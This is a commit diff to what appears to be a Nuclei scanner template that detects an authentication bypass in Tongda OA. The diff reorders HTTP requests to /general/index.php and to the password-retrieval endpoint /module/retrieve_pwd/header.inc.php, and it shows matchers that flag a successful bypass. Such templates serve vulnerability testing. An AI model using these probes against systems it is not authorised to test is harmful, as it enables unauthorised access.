Update tongdaoa-auth-bypass.yaml

2024-09-03 12:00:04 +04:00 · 2024-09-03 12:00:04 +04:00 · af24d79d18
parent 279635577a
commit af24d79d18
1 changed files with 11 additions and 12 deletions
--- a/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml
+++ b/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml
@ -18,6 +18,17 @@ info:
 flow: http(1) && http(2) && http(3)

 http:
+  - raw:
+      - |+
+        GET /general/index.php HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200 && contains(body,"<title>用户未登录</title>")'
+
  - raw:
      - |
        POST /module/retrieve_pwd/header.inc.php HTTP/1.1
@ -42,16 +53,4 @@ http:
      - type: dsl
        dsl:
          - 'status_code == 200 && !contains(body,"<title>用户未登录</title>")  && contains(body,"loginUser")'
-        internal: true
-
-  - raw:
-      - |+
-        GET /general/index.php HTTP/1.1
-        Host: {{Hostname}}
-
-    unsafe: true
-    matchers:
-      - type: dsl
-        dsl:
-          - 'status_code == 200 && contains(body,"<title>用户未登录</title>")'
 # digest: 4b0a00483046022100827e905c51b81993182e9320b324168da41af4255a5315692103a365288573e4022100a1043e68a509de2024cd374221b84f560491dadd41449cc52fb6e38da8b82dbc:922c64590222798bb761d5b6d8e72950